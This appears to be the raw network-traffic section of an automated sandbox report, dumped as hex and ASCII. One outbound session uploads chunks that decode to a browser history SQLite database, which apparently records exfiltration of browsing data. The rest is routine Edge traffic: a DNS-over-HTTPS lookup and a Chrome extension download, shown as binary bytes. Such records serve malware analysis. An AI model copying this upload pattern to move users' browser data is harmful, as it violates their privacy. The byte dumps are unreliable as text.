                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                        Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:41 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        20192.168.2.549823162.159.61.34437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:40 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                        CF-RAY: 8f878ca2ab3643ee-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 53 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomS)


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        21192.168.2.549817142.250.181.654437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:39 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 154477
                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                        Date: Thu, 26 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                        Expires: Fri, 26 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Age: 55346
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                        ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                        Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                        Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                        Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                        Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                        2024-12-27 07:20:40 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                        Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
